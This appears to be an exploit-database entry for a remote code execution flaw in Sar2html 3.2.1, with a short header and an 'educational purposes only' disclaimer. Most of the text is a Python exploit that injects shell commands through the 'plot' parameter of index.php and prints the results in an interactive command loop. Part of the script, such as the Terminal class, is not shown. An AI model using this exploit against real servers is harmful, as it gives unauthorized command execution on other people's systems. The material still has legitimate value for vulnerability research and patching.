Exploits / Vulnerability Discovered : 2021-01-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Sar2html 3.2.1 plot remote code execution is for educational purposes only and if it is used you will do on your own risk!
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()